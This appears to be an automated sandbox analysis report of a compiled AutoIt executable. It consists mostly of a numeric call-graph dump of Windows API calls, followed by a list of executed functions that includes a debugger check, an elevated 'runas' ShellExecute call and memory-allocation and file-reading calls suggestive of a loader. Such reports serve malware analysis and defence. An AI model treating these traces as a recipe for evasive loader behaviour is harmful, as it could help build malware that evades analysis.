40f598 87608->87609 87610 429358 87608->87610 87656 4033c0 113 API calls 7 library calls 87609->87656 87657 434034 86 API calls _wprintf 87610->87657 87613 42934b 87611->87613 87616 429373 87613->87616 87617 42934f 87613->87617 87615 40f5b4 87615->86721 87619 4115d7 52 API calls 87616->87619 87620 431e58 82 API calls 87617->87620 87618 429369 87618->87616 87632 4293c5 moneypunct 87619->87632 87620->87610 87621 42959c 87622 413748 _free 46 API calls 87621->87622 87623 4295a5 87622->87623 87624 431e58 82 API calls 87623->87624 87625 4295b1 87624->87625 87629 401b10 52 API calls 87629->87632 87632->87621 87632->87629 87639 444af8 87632->87639 87642 402780 87632->87642 87650 4022d0 87632->87650 87658 44c7dd 64 API calls 3 library calls 87632->87658 87659 44b41c 52 API calls 87632->87659 87634 410167 _wcslen 87633->87634 87635 4115d7 52 API calls 87634->87635 87636 41017e _wcscpy 87635->87636 87636->87586 87637->87600 87638->87603 87640 4115d7 52 API calls 87639->87640 87641 444b27 _memmove 87640->87641 87641->87632 87643 402790 moneypunct _memmove 87642->87643 87644 402827 87642->87644 87645 4115d7 52 API calls 87643->87645 87646 4115d7 52 API calls 87644->87646 87647 402797 87645->87647 87646->87643 87648 4115d7 52 API calls 87647->87648 87649 4027bd 87647->87649 87648->87649 87649->87632 87651 4022e0 87650->87651 87653 40239d 87650->87653 87652 4115d7 52 API calls 87651->87652 87651->87653 87654 402320 moneypunct 87651->87654 87652->87654 87653->87632 87654->87653 87655 4115d7 52 API calls 87654->87655 87655->87654 87656->87615 87657->87618 87658->87632 87659->87632 87661 402417 87660->87661 87666 402539 moneypunct 87660->87666 87662 4115d7 52 API calls 87661->87662 87661->87666 87663 402443 87662->87663 87664 4115d7 52 API calls 87663->87664 87667 4024b4 87664->87667 87666->86729 87667->87666 87668 4022d0 52 API calls 87667->87668 87689 402880 87667->87689 87668->87667 87673 401566 87669->87673 87670 401794 87741 40e9a0 90 API calls 87670->87741 87672 40167a 87676 4017c0 87672->87676 87742 45e737 90 API calls 3 library calls 87672->87742 87673->87670 87673->87672 87675 4010a0 52 API calls 87673->87675 87675->87673 87676->86731 87678 40bc70 52 API calls 87677->87678 87687 40d451 87678->87687 87679 40d50f 87745 410600 52 API calls 87679->87745 87681 427c01 87746 45e737 90 API calls 3 library calls 87681->87746 87682 40e0a0 52 API calls 87682->87687 87684 401b10 52 API calls 87684->87687 87685 40d519 87685->86734 87687->87679 87687->87681 87687->87682 87687->87684 87687->87685 87743 40f310 53 API calls 87687->87743 87744 40d860 91 API calls 87687->87744 87690 4115d7 52 API calls 87689->87690 87691 4028b3 87690->87691 87692 4115d7 52 API calls 87691->87692 87713 4028c5 moneypunct _memmove 87692->87713 87693 402780 52 API calls 87694 402b1e moneypunct 87693->87694 87694->87667 87695 427d62 87699 403350 52 API calls 87695->87699 87697 402bb6 87732 403060 53 API calls 87697->87732 87698 402aeb moneypunct 87698->87693 87702 42802b moneypunct 87698->87702 87708 427d6b 87699->87708 87701 402bca 87703 427f63 87701->87703 87704 402bd4 87701->87704 87738 460879 92 API calls 3 library calls 87703->87738 87707 402780 52 API calls 87704->87707 87705 403350 52 API calls 87705->87713 87710 402bdf 87707->87710 87730 427f2c 87708->87730 87735 403020 52 API calls _memmove 87708->87735 87710->87667 87712 427fd5 87739 460879 92 API calls 3 library calls 87712->87739 87713->87695 87713->87697 87713->87698 87713->87705 87713->87712 87715 402780 52 API calls 87713->87715 87717 402f00 52 API calls 87713->87717 87719 428000 87713->87719 87721 427fa5 87713->87721 87724 4026f0 52 API calls 87713->87724 87729 4115d7 52 API calls 87713->87729 87713->87730 87731 4031b0 63 API calls 87713->87731 87733 402f80 92 API calls _memmove 87713->87733 87734 402280 52 API calls 87713->87734 87736 4013a0 52 API calls 87713->87736 87715->87713 87717->87713 87740 460879 92 API calls 3 library calls 87719->87740 87720 427fe4 87726 402780 52 API calls 87720->87726 87727 402780 52 API calls 87721->87727 87722 427f48 87722->87694 87725 402a85 CharUpperBuffW 87724->87725 87725->87713 87726->87722 87727->87694 87729->87713 87737 460879 92 API calls 3 library calls 87730->87737 87731->87713 87732->87701 87733->87713 87734->87713 87735->87708 87736->87713 87737->87722 87738->87722 87739->87720 87740->87694 87741->87672 87742->87676 87743->87687 87744->87687 87745->87685 87746->87685 87747->86747 87748->86748 87750 42c5fe 87749->87750 87765 4091c6 87749->87765 87751 40bc70 52 API calls 87750->87751 87750->87765 87752 42c64e InterlockedIncrement 87751->87752 87753 42c665 87752->87753 87758 42c697 87752->87758 87755 42c672 InterlockedDecrement Sleep InterlockedIncrement 87753->87755 87753->87758 87754 42c737 InterlockedDecrement 87756 42c74a 87754->87756 87755->87753 87755->87758 87759 408f40 VariantClear 87756->87759 87757 42c731 87757->87754 87758->87754 87758->87757 87907 408e80 87758->87907 87761 42c752 87759->87761 87920 410c60 VariantClear moneypunct 87761->87920 87765->86808 87766 42c6db 87767 402160 52 API calls 87766->87767 87768 42c6e5 87767->87768 87769 45340c 85 API calls 87768->87769 87770 42c6f1 87769->87770 87917 40d200 52 API calls 2 library calls 87770->87917 87772 42c6fb 87918 465124 53 API calls 87772->87918 87774 42c715 87775 42c76a 87774->87775 87776 42c719 87774->87776 87777 401b10 52 API calls 87775->87777 87919 46fe32 VariantClear 87776->87919 87779 42c77e 87777->87779 87780 401980 53 API calls 87779->87780 87784 42c796 87780->87784 87781 42c812 87922 46fe32 VariantClear 87781->87922 87783 42c82a InterlockedDecrement 87923 46ff07 54 API calls 87783->87923 87784->87781 87786 42c864 87784->87786 87921 40ba10 52 API calls 2 library calls 87784->87921 87924 45e737 90 API calls 3 library calls 87786->87924 87788 42c9ec 87967 47d33e 336 API calls 87788->87967 87791 42c9fe 87968 46feb1 VariantClear VariantClear 87791->87968 87793 42ca08 87795 401b10 52 API calls 87793->87795 87794 408f40 VariantClear 87803 42c849 87794->87803 87797 42ca15 87795->87797 87796 408f40 VariantClear 87798 42c891 87796->87798 87799 40c2c0 52 API calls 87797->87799 87925 410c60 VariantClear moneypunct 87798->87925 87804 42c874 87799->87804 87801 401980 53 API calls 87801->87803 87802 402780 52 API calls 87802->87803 87803->87788 87803->87794 87803->87801 87803->87802 87926 40a780 87803->87926 87804->87796 87806 42ca59 87804->87806 87806->87806 87808 40afc4 87807->87808 87809 40b156 87807->87809 87810 40afd5 87808->87810 87811 42d1e3 87808->87811 87979 45e737 90 API calls 3 library calls 87809->87979 87815 40a780 199 API calls 87810->87815 87829 40b11a moneypunct 87810->87829 87980 45e737 90 API calls 3 library calls 87811->87980 87814 42d1f8 87820 408f40 VariantClear 87814->87820 87818 40b00a 87815->87818 87816 40b143 87816->86808 87818->87814 87821 40b012 87818->87821 87819 42d4db 87819->87819 87820->87816 87822 42d231 VariantClear 87821->87822 87823 40b04a 87821->87823 87830 40b094 moneypunct 87821->87830 87832 40b05c moneypunct 87822->87832 87823->87832 87981 40e270 VariantClear moneypunct 87823->87981 87824 42d45a VariantClear 87824->87829 87826 40b108 87826->87829 87982 40e270 VariantClear moneypunct 87826->87982 87827 4115d7 52 API calls 87827->87830 87829->87816 87983 45e737 90 API calls 3 library calls 87829->87983 87830->87826 87831 42d425 moneypunct 87830->87831 87831->87824 87831->87829 87832->87827 87832->87830 87834 408fff 87833->87834 87836 40900d 87833->87836 87984 403ea0 52 API calls __cinit 87834->87984 87838 42c3f6 87836->87838 87840 42c44a 87836->87840 87841 40a780 199 API calls 87836->87841 87844 42c47b 87836->87844 87845 42c4cb 87836->87845 87846 42c564 87836->87846 87850 42c548 87836->87850 87853 409112 87836->87853 87855 42c528 87836->87855 87857 4090df 87836->87857 87858 4090ea 87836->87858 87867 4090f2 moneypunct 87836->87867 87986 4534e3 52 API calls 87836->87986 87988 40c4e0 199 API calls 87836->87988 87987 45e737 90 API calls 3 library calls 87838->87987 87989 45e737 90 API calls 3 library calls 87840->87989 87841->87836 87990 451b42 61 API calls 87844->87990 87992 47faae 238 API calls 87845->87992 87851 408f40 VariantClear 87846->87851 87848 42c491 87848->87867 87991 45e737 90 API calls 3 library calls 87848->87991 87995 45e737 90 API calls 3 library calls 87850->87995 87851->87867 87852 42c4da 87852->87867 87993 45e737 90 API calls 3 library calls 87852->87993 87853->87850 87860 40912b 87853->87860 87994 45e737 90 API calls 3 library calls 87855->87994 87857->87858 87862 408e80 VariantClear 87857->87862 87863 408f40 VariantClear 87858->87863 87860->87867 87985 403e10 53 API calls 87860->87985 87862->87858 87863->87867 87865 40914b 87866 408f40 VariantClear 87865->87866 87866->87867 87867->86808 87996 408d90 87868->87996 87870 429778 88025 410c60 VariantClear moneypunct 87870->88025 87872 429780 87873 408cf9 87873->87870 87874 42976c 87873->87874 87876 408d2d 87873->87876 88024 45e737 90 API calls 3 library calls 87874->88024 88012 403d10 87876->88012 87879 408d71 moneypunct 87879->86808 87880 408f40 VariantClear 87881 408d45 moneypunct 87880->87881 87881->87879 87881->87880 87882->86808 87883->86808 87884->86808 87885->86808 87886->86758 87887->86763 87888->86808 87889->86808 87890->86808 87891->86808 87892->86815 87893->86815 87894->86815 87895->86815 87896->86815 87897->86815 87898->86815 87900 403cdf 87899->87900 87901 408f40 VariantClear 87900->87901 87902 403ce7 87901->87902 87902->86801 87903->86815 87904->86815 87905->86808 87906->86755 87908 408e94 87907->87908 87909 408e88 87907->87909 87911 45340c 87908->87911 87910 408f40 VariantClear 87909->87910 87910->87908 87912 453439 87911->87912 87913 453419 87911->87913 87912->87766 87914 45342f 87913->87914 87969 4531b1 85 API calls 5 library calls 87913->87969 87914->87766 87916 453425 87916->87766 87917->87772 87918->87774 87919->87757 87920->87765 87921->87784 87922->87783 87923->87803 87924->87804 87925->87765 87927 40a7a6 87926->87927 87928 40ae8c 87926->87928 87930 4115d7 52 API calls 87927->87930 87970 41130a 51 API calls __cinit 87928->87970 87965 40a7c6 moneypunct _memmove 87930->87965 87931 40a86d 87933 40abd1 87931->87933 87950 40a878 moneypunct 87931->87950 87932 408e80 VariantClear 87932->87965 87975 45e737 90 API calls 3 library calls 87933->87975 87934 4115d7 52 API calls 87934->87965 87936 40bc10 53 API calls 87936->87965 87937 401b10 52 API calls 87937->87965 87938 40b5f0 89 API calls 87938->87965 87939 42b791 VariantClear 87939->87965 87940 42ba2d VariantClear 87940->87965 87941 408f40 VariantClear 87941->87950 87942 42b459 VariantClear 87942->87965 87943 40a884 moneypunct 87943->87803 87944 408cc0 192 API calls 87944->87965 87946 42b6f6 VariantClear 87946->87965 87947 42bc5b 87947->87803 87948 4530c9 VariantClear 87948->87965 87949 42bb6a 87978 44b92d VariantClear 87949->87978 87950->87941 87950->87943 87951 40e270 VariantClear 87951->87965 87952 42bbf5 87976 45e737 90 API calls 3 library calls 87952->87976 87954 4115d7 52 API calls 87956 42b5b3 VariantInit VariantCopy 87954->87956 87955 408f40 VariantClear 87955->87965 87959 42b5d7 VariantClear 87956->87959 87956->87965 87959->87965 87961 42bc37 87977 45e737 90 API calls 3 library calls 87961->87977 87964 42bc48 87964->87949 87966 408f40 VariantClear 87964->87966 87965->87931 87965->87932 87965->87933 87965->87934 87965->87936 87965->87937 87965->87938 87965->87939 87965->87940 87965->87942 87965->87944 87965->87946 87965->87948 87965->87949 87965->87951 87965->87952 87965->87954 87965->87955 87965->87961 87971 45308a 53 API calls 87965->87971 87972 470870 52 API calls 87965->87972 87973 457f66 87 API calls __write_nolock 87965->87973 87974 472f47 127 API calls 87965->87974 87966->87949 87967->87791 87968->87793 87969->87916 87970->87965 87971->87965 87972->87965 87973->87965 87974->87965 87975->87949 87976->87949 87977->87964 87978->87947 87979->87811 87980->87814 87981->87832 87982->87829 87983->87819 87984->87836 87985->87865 87986->87836 87987->87867 87988->87836 87989->87867 87990->87848 87991->87867 87992->87852 87993->87867 87994->87867 87995->87846 87997 4289d2 87996->87997 87998 408db3 87996->87998 88028 45e737 90 API calls 3 library calls 87997->88028 88026 40bec0 90 API calls 87998->88026 88001 4289e5 88029 45e737 90 API calls 3 library calls 88001->88029 88004 428a05 88005 408f40 VariantClear 88004->88005 88011 408e5a 88005->88011 88006 40a780 199 API calls 88009 408dc9 88006->88009 88007 408e64 88008 408f40 VariantClear 88007->88008 88008->88011 88009->88001 88009->88004 88009->88006 88009->88007 88010 408f40 VariantClear 88009->88010 88009->88011 88027 40ba10 52 API calls 2 library calls 88009->88027 88010->88009 88011->87873 88013 408f40 VariantClear 88012->88013 88014 403d20 88013->88014 88015 403cd0 VariantClear 88014->88015 88016 403d4d 88015->88016 88030 45e17d 88016->88030 88040 4755ad 88016->88040 88043 46e91c 88016->88043 88046 40de10 88016->88046 88051 467897 88016->88051 88095 4813fa 88016->88095 88017 403d76 88017->87870 88017->87881 88024->87870 88025->87872 88026->88009 88027->88009 88028->88001 88029->88004 88031 45e198 88030->88031 88032 45e19c 88031->88032 88033 45e1b8 88031->88033 88034 408f40 VariantClear 88032->88034 88035 45e1db FindClose 88033->88035 88037 45e1cc 88033->88037 88036 45e1a4 88034->88036 88038 45e1d9 moneypunct 88035->88038 88036->88017 88037->88038 88105 44ae3e 88037->88105 88038->88017 88118 475077 88040->88118 88042 4755c0 88042->88017 88222 46e785 88043->88222 88045 46e92f 88045->88017 88047 4115d7 52 API calls 88046->88047 88048 40de23 88047->88048 88049 40da20 CloseHandle 88048->88049 88050 40de2e 88049->88050 88050->88017 88052 4678bb 88051->88052 88055 45340c 85 API calls 88052->88055 88082 467954 88052->88082 88053 4115d7 52 API calls 88054 467989 88053->88054 88056 467995 88054->88056 88310 40da60 53 API calls 88054->88310 88057 4678f6 88055->88057 88060 4533eb 85 API calls 88056->88060 88059 413a0e __wsplitpath 46 API calls 88057->88059 88061 4678fc 88059->88061 88062 4679b7 88060->88062 88063 401b10 52 API calls 88061->88063 88064 40de40 60 API calls 88062->88064 88065 46790c 88063->88065 88066 4679c3 88064->88066 88307 40d200 52 API calls 2 library calls 88065->88307 88068 4679c7 GetLastError 88066->88068 88069 467a05 88066->88069 88071 403cd0 VariantClear 88068->88071 88072 467a2c 88069->88072 88073 467a4b 88069->88073 88070 467917 88070->88082 88308 4339fa GetFileAttributesW FindFirstFileW FindClose 88070->88308 88074 4679dc 88071->88074 88076 4115d7 52 API calls 88072->88076 88077 4115d7 52 API calls 88073->88077 88078 4679e6 88074->88078 88086 44ae3e CloseHandle 88074->88086 88084 467a31 88076->88084 88085 467a49 88077->88085 88081 408f40 VariantClear 88078->88081 88079 467928 88080 46792f 88079->88080 88079->88082 88309 4335cd 56 API calls 3 library calls 88080->88309 88088 4679ed 88081->88088 88082->88053 88083 467964 88082->88083 88083->88017 88311 436299 52 API calls 2 library calls 88084->88311 88090 408f40 VariantClear 88085->88090 88086->88078 88088->88017 88092 467a88 88090->88092 88091 467939 88091->88082 88093 408f40 VariantClear 88091->88093 88092->88017 88094 467947 88093->88094 88094->88082 88096 45340c 85 API calls 88095->88096 88097 481438 88096->88097 88098 402880 95 API calls 88097->88098 88099 48143f 88098->88099 88100 40a780 199 API calls 88099->88100 88102 481465 88099->88102 88100->88102 88104 481469 88102->88104 88312 40e710 53 API calls 88102->88312 88103 4814a4 88103->88017 88104->88017 88107 44ae4b moneypunct 88105->88107 88108 443fdf 88105->88108 88107->88038 88113 40da20 88108->88113 88110 443feb 88117 4340db CloseHandle moneypunct 88110->88117 88112 444001 88112->88107 88114 40da37 88113->88114 88115 40da29 88113->88115 88114->88115 88116 40da3c CloseHandle 88114->88116 88115->88110 88116->88110 88117->88112 88169 4533eb 88118->88169 88121 4750ee 88123 408f40 VariantClear 88121->88123 88122 475129 88173 4646e0 88122->88173 88131 4750f5 88123->88131 88125 47515e 88126 475162 88125->88126 88153 47518e 88125->88153 88128 408f40 VariantClear 88126->88128 88127 475357 88129 475365 88127->88129 88130 4754ea 88127->88130 88149 475169 88128->88149 88207 44b3ac 57 API calls 88129->88207 88213 464812 91 API calls 88130->88213 88131->88042 88135 4754fc 88136 475374 88135->88136 88137 475508 88135->88137 88186 430d31 88136->88186 88139 408f40 VariantClear 88137->88139 88138 4533eb 85 API calls 88138->88153 88141 47550f 88139->88141 88141->88149 88142 475388 88193 4577e9 88142->88193 88145 47539e 88201 410cfc 88145->88201 88146 475480 88147 408f40 VariantClear 88146->88147 88147->88149 88149->88042 88151 4753d4 88209 40e830 53 API calls 88151->88209 88152 4753b8 88208 45e737 90 API calls 3 library calls 88152->88208 88153->88127 88153->88138 88153->88146 88157 4754b5 88153->88157 88205 436299 52 API calls 2 library calls 88153->88205 88206 463ad5 64 API calls __wcsicoll 88153->88206 88156 4753e3 88167 475406 88156->88167 88210 40cf00 53 API calls 88156->88210 88159 408f40 VariantClear 88157->88159 88158 4753c5 GetCurrentProcess TerminateProcess 88158->88151 88159->88149 88161 4753f8 88211 46c43e 106 API calls 2 library calls 88161->88211 88166 408e80 VariantClear 88166->88167 88167->88149 88167->88166 88168 408f40 VariantClear 88167->88168 88212 40cf00 53 API calls 88167->88212 88214 44b3ac 57 API calls 88167->88214 88215 46c43e 106 API calls 2 library calls 88167->88215 88168->88167 88170 453404 88169->88170 88171 4533f8 88169->88171 88170->88121 88170->88122 88171->88170 88216 4531b1 85 API calls 5 library calls 88171->88216 88217 4536f7 53 API calls 88173->88217 88175 4646fc 88218 4426cd 59 API calls _wcslen 88175->88218 88177 464711 88179 40bc70 52 API calls 88177->88179 88185 46474b 88177->88185 88180 46472c 88179->88180 88219 461465 52 API calls _memmove 88180->88219 88182 464741 88183 40c600 52 API calls 88182->88183 88183->88185 88184 464793 88184->88125 88185->88184 88220 463ad5 64 API calls __wcsicoll 88185->88220 88187 430db2 88186->88187 88188 430d54 88186->88188 88187->88142 88189 4115d7 52 API calls 88188->88189 88190 430d74 88189->88190 88191 430da9 88190->88191 88192 4115d7 52 API calls 88190->88192 88191->88142 88192->88190 88194 457a84 88193->88194 88195 45780c _strcat moneypunct _wcslen _wcscpy 88193->88195 88194->88145 88195->88194 88196 443006 57 API calls 88195->88196 88198 4135bb 46 API calls _malloc 88195->88198 88199 45340c 85 API calls 88195->88199 88200 40f6f0 54 API calls 88195->88200 88221 44b3ac 57 API calls 88195->88221 88196->88195 88198->88195 88199->88195 88200->88195 88202 410d11 88201->88202 88203 410da9 VirtualProtect 88202->88203 88204 410d77 88202->88204 88203->88204 88204->88151 88204->88152 88205->88153 88206->88153 88207->88136 88208->88158 88209->88156 88210->88161 88211->88167 88212->88167 88213->88135 88214->88167 88215->88167 88216->88170 88217->88175 88218->88177 88219->88182 88220->88184 88221->88195 88223 46e7a2 88222->88223 88224 4115d7 52 API calls 88223->88224 88227 46e802 88223->88227 88225 46e7ad 88224->88225 88226 46e7b9 88225->88226 88270 40da60 53 API calls 88225->88270 88231 4533eb 85 API calls 88226->88231 88228 46e7e5 88227->88228 88235 46e82f 88227->88235 88229 408f40 VariantClear 88228->88229 88232 46e7ea 88229->88232 88233 46e7ca 88231->88233 88232->88045 88271 40de40 88233->88271 88234 46e8b5 88263 4680ed 88234->88263 88235->88234 88237 46e845 88235->88237 88240 4533eb 85 API calls 88237->88240 88250 46e84b 88240->88250 88241 46e7db 88241->88228 88244 44ae3e CloseHandle 88241->88244 88242 46e8bb 88267 443fbe 88242->88267 88243 46e87a 88283 4689f4 59 API calls 88243->88283 88244->88228 88246 46e883 88284 4013c0 52 API calls 88246->88284 88250->88243 88250->88246 88251 46e88f 88253 40e0a0 52 API calls 88251->88253 88252 408f40 VariantClear 88261 46e881 88252->88261 88254 46e899 88253->88254 88285 40d200 52 API calls 2 library calls 88254->88285 88256 46e911 88256->88045 88257 46e8a5 88286 4689f4 59 API calls 88257->88286 88258 40da20 CloseHandle 88260 46e903 88258->88260 88262 44ae3e CloseHandle 88260->88262 88261->88256 88261->88258 88262->88256 88264 4680fa 88263->88264 88266 468100 88263->88266 88287 467ac4 55 API calls 2 library calls 88264->88287 88266->88242 88288 443e36 88267->88288 88269 443fd3 88269->88252 88269->88261 88270->88226 88272 40da20 CloseHandle 88271->88272 88273 40de4e 88272->88273 88295 40f110 88273->88295 88276 4264fa 88278 40de84 88304 40e080 SetFilePointerEx SetFilePointerEx 88278->88304 88280 40de8b 88305 40f160 SetFilePointerEx SetFilePointerEx WriteFile 88280->88305 88282 40de90 88282->88235 88282->88241 88283->88261 88284->88251 88285->88257 88286->88261 88287->88266 88291 443e19 88288->88291 88292 443e26 88291->88292 88293 443e32 WriteFile 88291->88293 88294 443db4 SetFilePointerEx SetFilePointerEx 88292->88294 88293->88269 88294->88293 88296 40f125 CreateFileW 88295->88296 88297 42630c 88295->88297 88299 40de74 88296->88299 88298 426311 CreateFileW 88297->88298 88297->88299 88298->88299 88300 426337 88298->88300 88299->88276 88303 40dea0 55 API calls moneypunct 88299->88303 88306 40df90 SetFilePointerEx SetFilePointerEx 88300->88306 88302 426342 88302->88299 88303->88278 88304->88280 88305->88282 88306->88302 88307->88070 88308->88079 88309->88091 88310->88056 88311->88085 88312->88103 88313 4165480 88327 41630d0 88313->88327 88315 416555e 88330 4165370 88315->88330 88317 4165587 CreateFileW 88319 41655d6 88317->88319 88320 41655db 88317->88320 88320->88319 88321 41655f2 VirtualAlloc 88320->88321 88321->88319 88322 4165610 ReadFile 88321->88322 88322->88319 88323 416562b 88322->88323 88324 4164370 13 API calls 88323->88324 88325 416565e 88324->88325 88326 4165681 ExitProcess 88325->88326 88326->88319 88333 4166590 GetPEB 88327->88333 88329 416375b 88329->88315 88331 4165379 Sleep 88330->88331 88332 4165387 88331->88332 88334 41665ba 88333->88334 88334->88329 88335 42d154 88339 480a8d 88335->88339 88337 42d161 88338 480a8d 199 API calls 88337->88338 88338->88337 88340 480ae4 88339->88340 88341 480b26 88339->88341 88343 480aeb 88340->88343 88344 480b15 88340->88344 88342 40bc70 52 API calls 88341->88342 88354 480b2e 88342->88354 88346 480aee 88343->88346 88347 480b04 88343->88347 88372 4805bf 199 API calls 88344->88372 88346->88341 88349 480af3 88346->88349 88371 47fea2 199 API calls __itow_s 88347->88371 88370 47f135 199 API calls 88349->88370 88351 40e0a0 52 API calls 88351->88354 88353 408f40 VariantClear 88356 481156 88353->88356 88354->88351 88355 480aff 88354->88355 88359 40e710 53 API calls 88354->88359 88360 401980 53 API calls 88354->88360 88362 40c2c0 52 API calls 88354->88362 88363 408e80 VariantClear 88354->88363 88364 480ff5 88354->88364 88365 40a780 199 API calls 88354->88365 88373 45377f 52 API calls 88354->88373 88374 45e951 53 API calls 88354->88374 88375 40e830 53 API calls 88354->88375 88376 47925f 53 API calls 88354->88376 88377 47fcff 199 API calls 88354->88377 88355->88353 88357 408f40 VariantClear 88356->88357 88358 48115e 88357->88358 88358->88337 88359->88354 88360->88354 88362->88354 88363->88354 88378 45e737 90 API calls 3 library calls 88364->88378 88365->88354 88370->88355 88371->88355 88372->88355 88373->88354 88374->88354 88375->88354 88376->88354 88377->88354 88378->88355 88379 425b2b 88384 40f000 88379->88384 88383 425b3a 88385 4115d7 52 API calls 88384->88385 88386 40f007 88385->88386 88387 4276ea 88386->88387 88393 40f030 88386->88393 88392 41130a 51 API calls __cinit 88392->88383 88394 40f039 88393->88394 88395 40f01a 88393->88395 88423 41130a 51 API calls __cinit 88394->88423 88397 40e500 88395->88397 88398 40bc70 52 API calls 88397->88398 88399 40e515 GetVersionExW 88398->88399 88400 402160 52 API calls 88399->88400 88401 40e557 88400->88401 88424 40e660 88401->88424 88407 427674 88410 4276c6 GetSystemInfo 88407->88410 88409 40e5cd GetCurrentProcess 88445 40ef20 LoadLibraryA GetProcAddress 88409->88445 88412 4276d5 GetSystemInfo 88410->88412 88415 40e5e0 88415->88412 88438 40efd0 88415->88438 88416 40e629 88442 40ef90 88416->88442 88419 40e641 FreeLibrary 88420 40e644 88419->88420 88421 40e653 FreeLibrary 88420->88421 88422 40e656 88420->88422 88421->88422 88422->88392 88423->88395 88425 40e667 88424->88425 88426 42761d 88425->88426 88427 40c600 52 API calls 88425->88427 88428 40e55c 88427->88428 88429 40e680 88428->88429 88430 40e687 88429->88430 88431 427616 88430->88431 88432 40c600 52 API calls 88430->88432 88433 40e566 88432->88433 88433->88407 88434 40ef60 88433->88434 88435 40e5c8 88434->88435 88436 40ef66 LoadLibraryA 88434->88436 88435->88409 88435->88415 88436->88435 88437 40ef77 GetProcAddress 88436->88437 88437->88435 88439 40e620 88438->88439 88440 40efd6 LoadLibraryA 88438->88440 88439->88410 88439->88416 88440->88439 88441 40efe7 GetProcAddress 88440->88441 88441->88439 88446 40efb0 LoadLibraryA GetProcAddress 88442->88446 88444 40e632 GetNativeSystemInfo 88444->88419 88444->88420 88445->88415 88446->88444 88447 425b5e 88452 40c7f0 88447->88452 88451 425b6d 88487 40db10 52 API calls 88452->88487 88454 40c82a 88488 410ab0 6 API calls 88454->88488 88456 40c86d 88457 40bc70 52 API calls 88456->88457 88458 40c877 88457->88458 88459 40bc70 52 API calls 88458->88459 88460 40c881 88459->88460 88461 40bc70 52 API calls 88460->88461 88462 40c88b 88461->88462 88463 40bc70 52 API calls 88462->88463 88464 40c8d1 88463->88464 88465 40bc70 52 API calls 88464->88465 88466 40c991 88465->88466 88489 40d2c0 52 API calls 88466->88489 88468 40c99b 88490 40d0d0 53 API calls 88468->88490 88470 40c9c1 88471 40bc70 52 API calls 88470->88471 88472 40c9cb 88471->88472 88491 40e310 53 API calls 88472->88491 88474 40ca28 88475 408f40 VariantClear 88474->88475 88476 40ca30 88475->88476 88477 408f40 VariantClear 88476->88477 88478 40ca38 GetStdHandle 88477->88478 88479 429630 88478->88479 88480 40ca87 88478->88480 88479->88480 88481 429639 88479->88481 88486 41130a 51 API calls __cinit 88480->88486 88492 4432c0 57 API calls 88481->88492 88483 429641 88493 44b6ab CreateThread 88483->88493 88485 42964f CloseHandle 88485->88480 88486->88451 88487->88454 88488->88456 88489->88468 88490->88470 88491->88474 88492->88483 88493->88485 88494 44b5cb 58 API calls 88493->88494 88495 4165a2b 88496 4165a32 88495->88496 88497 4165ad0 88496->88497 88498 4165a3a 88496->88498 88515 4166380 9 API calls 88497->88515 88502 41656e0 88498->88502 88501 4165ab7 88503 41630d0 GetPEB 88502->88503 88512 416577f 88503->88512 88505 41657b0 CreateFileW 88508 41657bd 88505->88508 88505->88512 88506 41657d9 VirtualAlloc 88507 41657fa ReadFile 88506->88507 88506->88508 88507->88508 88509 4165818 VirtualAlloc 88507->88509 88510 41659cc VirtualFree 88508->88510 88511 41659da 88508->88511 88509->88508 88509->88512 88510->88511 88511->88501 88512->88506 88512->88508 88513 41658e0 CloseHandle 88512->88513 88514 41658f0 VirtualFree 88512->88514 88516 41665f0 GetPEB 88512->88516 88513->88512 88514->88512 88515->88501 88517 416661a 88516->88517 88517->88505 88518 425b6f 88523 40dc90 88518->88523 88522 425b7e 88524 40bc70 52 API calls 88523->88524 88525 40dd03 88524->88525 88531 40f210 88525->88531 88528 40dd96 88529 40ddb7 88528->88529 88534 40dc00 52 API calls 2 library calls 88528->88534 88530 41130a 51 API calls __cinit 88529->88530 88530->88522 88535 40f250 RegOpenKeyExW 88531->88535 88533 40f230 88533->88528 88534->88528 88536 425e17 88535->88536 88537 40f275 RegQueryValueExW 88535->88537 88536->88533 88538 40f2c3 RegCloseKey 88537->88538 88539 40f298 88537->88539 88538->88533 88540 40f2a9 RegCloseKey 88539->88540 88541 425e1d 88539->88541 88540->88533

                                                                  Executed Functions

                                                                  Function 0040D590 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 144windowCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 0040D5AA
                                                                    • Part of subcall function 00401F20: GetModuleFileNameW.KERNEL32(00000000,004A7F6C,00000104,?), ref: 00401F4C
                                                                    • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402007
                                                                    • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 0040201D
                                                                    • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402033
                                                                    • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402049
                                                                    • Part of subcall function 00401F20: _wcscpy.LIBCMT ref: 0040207C
                                                                  • IsDebuggerPresent.KERNEL32 ref: 0040D5B6
                                                                  • GetFullPathNameW.KERNEL32(004A7F6C,00000104,?,004A7F50,004A7F54), ref: 0040D625
                                                                    • Part of subcall function 00401460: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 004014A5
                                                                  • SetCurrentDirectoryW.KERNEL32(?,00000001), ref: 0040D699
                                                                  • MessageBoxA.USER32(00000000,This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.,00484C92,00000010), ref: 0042E1C9
                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 0042E238
                                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0042E268
                                                                  • GetForegroundWindow.USER32(runas,?,?,?,00000001), ref: 0042E2B2
                                                                  • ShellExecuteW.SHELL32(00000000), ref: 0042E2B9
                                                                    • Part of subcall function 00410390: GetSysColorBrush.USER32(0000000F), ref: 0041039B
                                                                    • Part of subcall function 00410390: LoadCursorW.USER32(00000000,00007F00), ref: 004103AA
                                                                    • Part of subcall function 00410390: LoadIconW.USER32(?,00000063), ref: 004103C0
                                                                    • Part of subcall function 00410390: LoadIconW.USER32(?,000000A4), ref: 004103D3
                                                                    • Part of subcall function 00410390: LoadIconW.USER32(?,000000A2), ref: 004103E6
                                                                    • Part of subcall function 00410390: LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041040E
                                                                    • Part of subcall function 00410390: RegisterClassExW.USER32(?), ref: 0041045D
